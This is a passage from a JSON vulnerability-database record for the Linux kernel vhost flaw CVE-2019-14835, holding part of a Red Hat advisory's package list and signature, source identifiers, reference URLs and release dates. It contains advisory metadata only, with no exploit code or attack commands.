7.4):\n\nSource:\nkernel-3.10.0-693.59.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-693.59.1.el7.noarch.rpm\nkernel-doc-3.10.0-693.59.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-devel-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-headers-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-693.59.1.el7.x86_64.rpm\nperf-3.10.0-693.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.4):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-693.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.4):\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-693.59.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-693.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.4):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-693.59.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-693.59.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14835\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/kernel-vhost\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXYi86tzjgjWX9erEAQi1YA//SFbLNTK8xgMJM4UXWUDM7d1LMS/f79kZ\nC+qG3/+OUqyltICprPUpLQOslAaLgY1C1slkqkxXXgNtfB4rBnE2gkDtSnqe0a7K\n60JapVVCpXuJnGozoFusUPgSvy7DM3RJ+xcz4SS6fNIuRGq1bDjOd4E3tcQwk1rh\nhqqPwPmY1uJK2y6UWiyF9Q2Dvug5mO2ZKqxgwuZPQyRXg14BVxDfXIY6+8SuuL3j\nYLVmCNqpErcoqeIaUAXUbGyATrUwni8J1RY4Q5lNDMq8u31Xlu/CSaEqU5OxtkeB\nRvfAuFebnJkUo+YkzouWWKF+eTEhpqxXnPZq2KM8zStGmRpVmreg16THa6CSpi81\nHDcsTNKFHsA3QWHosxramg1Z/RYSD+goD0lvnfEVvO4jaUW2f59q2PEu4riM897f\nL21luddDijVBYmzAngkrhKR0kiADLmU+p67nZ9EyNrR95XYaaJ6GRb5vSXBEgiXt\nvJJn8GuJAI5h13MzO5rAua82xTHxiQc28s5KCbCJFcp3DZo72mDIVE6MfGb1By5e\nT1IN17xPN7yVoy/c8WZ89unoNZNXMsTBhcWNNlXsXknALVaYi5i4AtWx3mOLP2gk\nc1Z7F9XG8niCTGSLvBs5gSAfjSFNB6YiU6NzX9Zlxb4/hr3HE20S+w3AGnvD2f05\nhz6LDDCc4xc=hk2d\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154562"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "db": "PACKETSTORM",
        "id": "154570"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-14835",
        "trust": 2.0
      },
      {
        "db": "PACKETSTORM",
        "id": "155212",
        "trust": 1.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "trust": 1.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154572",
        "trust": 1.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/03/1",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/09/7",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/09/24/1",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/10/09/3",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/09/17/1",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154570",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154602",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154562",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154514",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154540",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154659",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "154539",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154538",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154513",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154566",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154563",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154564",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154565",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154541",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154558",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154585",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154569",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-807",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-146821",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154562"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "db": "PACKETSTORM",
        "id": "154570"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "id": "VAR-201909-0695",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      }
    ],
    "trust": 0.35113123999999996
  },
  "last_update_date": "2024-07-23T20:01:54.800000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2830"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2862"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2867"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2901"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:2924"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/sep/41"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/nov/11"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2019/dsa-4531"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/yw3qnmpenpfegvtofpsnobl7jeijs25p/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kqfy6jyfiq2vfq7qcsxpwtul5zdncjl5/"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhba-2019:2824"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2827"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2828"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2829"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2854"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2863"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2864"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2865"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2866"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2869"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2889"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2899"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:2900"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/4135-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/4135-2/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/09/24/1"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/03/1"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/09/3"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2019/10/09/7"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/154572/kernel-live-patch-security-notice-lsn-0056-1.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-qemu-en"
      },
      {
        "trust": 1.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14835"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
      },
      {
        "trust": 1.1,
        "url": "https://www.openwall.com/lists/oss-security/2019/09/17/1"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/vulnerabilities/kernel-vhost"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2019-14835"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.2,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.0.0-29.31~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1122.131"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1017.18"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15030"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1059.64"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1017.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1017.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-29.31"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1094.105"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1050.52~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1044.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1047.51"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1050.52"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-64.73"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1021.22"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1016.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1058.65"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1126.132"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1056.65"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1046.46"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1017.17~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4135-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.70"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-164.192"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1064.71"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15031"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-64.73~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20961"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-2215"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17054"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17055"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17053"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17052"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14816"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15098"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2215"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10905"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17056"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17056"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14821"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17055"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14814"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15505"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17052"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154562"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "db": "PACKETSTORM",
        "id": "154570"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154562"
      },
      {
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "db": "PACKETSTORM",
        "id": "154570"
      },
      {
        "db": "PACKETSTORM",
        "id": "154540"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-09-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "date": "2019-09-25T17:55:27",
        "db": "PACKETSTORM",
        "id": "154602"
      },
      {
        "date": "2019-09-18T21:22:40",
        "db": "PACKETSTORM",
        "id": "154514"
      },
      {
        "date": "2019-10-23T18:32:10",
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "date": "2019-11-08T15:37:19",
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "date": "2019-09-23T18:25:39",
        "db": "PACKETSTORM",
        "id": "154562"
      },
      {
        "date": "2019-09-30T04:44:44",
        "db": "PACKETSTORM",
        "id": "154659"
      },
      {
        "date": "2019-09-23T18:31:46",
        "db": "PACKETSTORM",
        "id": "154572"
      },
      {
        "date": "2019-09-23T18:27:09",
        "db": "PACKETSTORM",
        "id": "154570"
      },
      {
        "date": "2019-09-20T14:57:53",
        "db": "PACKETSTORM",
        "id": "154540"
      },
      {
        "date": "2019-09-17T16:15:10.980000",
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-12T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146821"
      },
      {
        "date": "2023-12-15T15:29:09.587000",
        "db": "NVD",
        "id": "CVE-2019-14835"
      }
    ]
  },
  "threat_type": {
    "@context": {
